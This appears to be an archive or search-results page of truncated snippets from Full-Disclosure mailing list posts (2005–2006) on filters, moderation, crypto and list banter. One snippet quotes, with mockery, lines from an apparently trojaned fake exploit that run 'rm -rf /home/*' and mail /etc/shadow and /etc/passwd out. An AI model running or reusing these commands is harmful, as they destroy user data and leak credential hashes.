On Mar 26, 2006, at 12:12 PM, Anders B Jansson wrote:
And even then they fail the actual user has a gun at his temple.
Frankly, this is true of just about any authentication scheme.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok
This was brought up in 2600 years ago, as a way of bypassing content
filters that blocked 2600.com (as long as they only blocked by URL).
Interestingly enough, on the Summer 2000 cover
(http://www.2600.com/covers/fa001.gif), the cell phone displays the
decimal equivalent of 2600.com's IP address,
Bantown is like FYAD if FYAD wasn't funny
On Dec 17, 2005, at 11:26 PM, Andrew A wrote:
Because of my philosophical leanings, I have made the assumption
that freedom of speech and expression is an inalienable right
granted by nature's God. I have made the extension to this
statement that t
On Dec 16, 2005, at 5:55 PM, Michael Evanchik wrote:
I second this
There's no point discussing it, or holding it to a vote. The purpose
of this list is to be unmoderated. The list owner has stated over
and over that that is the one point he will not concede on.
Kurt Seifried, among ot
On Dec 15, 2005, at 7:09 AM, Werner Schalk wrote:
Ok I should have been more precise in my previous mail. In this
scenario I
don't have control over the output generated by the find command. So
basically the cronjob is something like:
15 4 * * 6 root /usr/bin/find /home/userA -type f -pri
ust to clarify, this bug only affects the SSL patch, but that
is quite commonly used.
-James Longstreet
On Nov 4, 2005, at 8:49 PM, kcope wrote:
hello this is kcope,
i got juarez for you..
lnxFTPDssl_warez.c is a remote r00t exploit
for the latest version of linux-ft
On Nov 1, 2005, at 12:11 PM, Brandon Enright wrote:
IIRC, there aren't any good known attacks against Blowfish, AES, or
Twofish
so the *RIGHT* algorithm is whatever works best for your application.
Depending on the situation, there may be a feasible cache-timing
attack on software impleme
On Wed, 10 Aug 2005, J.A. Terranson wrote:
> Mr Mirabilis yesterday said he had received more than 100 inquiries
> from motorists anxious to use the same defence. "People have shown it
> [the algorithm] has been hacked and it's open to viruses."
MD5 has viruses?!?!
7122cdcf85cef9500687fb0e5e08fa
On Wed, 10 Aug 2005, Ahmad N wrote:
> can anybody suggest a website???
http://www.sourceforge.net/
There's hundreds of 0-days there. They're pretty well hidden though,
you'll have to do a lot of inspection to find them.
___
Full-Disclosure - We belie
On Fri, 15 Jul 2005, Lauro, John wrote:
> 6.2? What is that??? Latest kernel is 2.6...
No, not kernel 6.2, LINUX 6.2. You know, that old version. Linux 10 has
been out for months.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.o
Translation for the lazy:
http://www.myfreeshares.com/click.php?adcode=1119376798&user=051206401447
http://www.myfreeshares.com/click.php?adcode=1118753072&user=051206401447
Everyone loves pyramid schemes.
On Thu, 23 Jun 2005 [EMAIL PROTECTED] wrote:
> hi list again
> foregive me for my wrong U
On Wed, 25 May 2005, Castigliola, Angelo wrote:
> Don't think a hacker could do much with this. At best someone could try
> to use the exploit to phish passwords from NSA.GOV employees.
That's not a problem?
___
Full-Disclosure - We believe in it.
Chart
On Wed, 11 May 2005 [EMAIL PROTECTED] wrote:
Has anyone ever wondered why SCO's mails come from
[EMAIL PROTECTED] Why not just make them come from
[EMAIL PROTECTED] Or at least set the Reply-To: field?
Other than preventing spam, is there a greater purpose here that I'm
missing?
Cute.
shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk "
On Wed, 20 Apr 2005, Day Jay wrote:
> Sorry, the previous code was broken. This code sh
On Thu, 24 Mar 2005, Tim wrote:
> Last I read, the license requires credit be given where credit is due.
> Maybe I missed it, but I haven't ever seen that credit be given in the
> documentation shipped with Windoze.
I don't know if it's credit per se, but I just ran strings on XP's
finger.exe:
>
15 matches
Mail list logo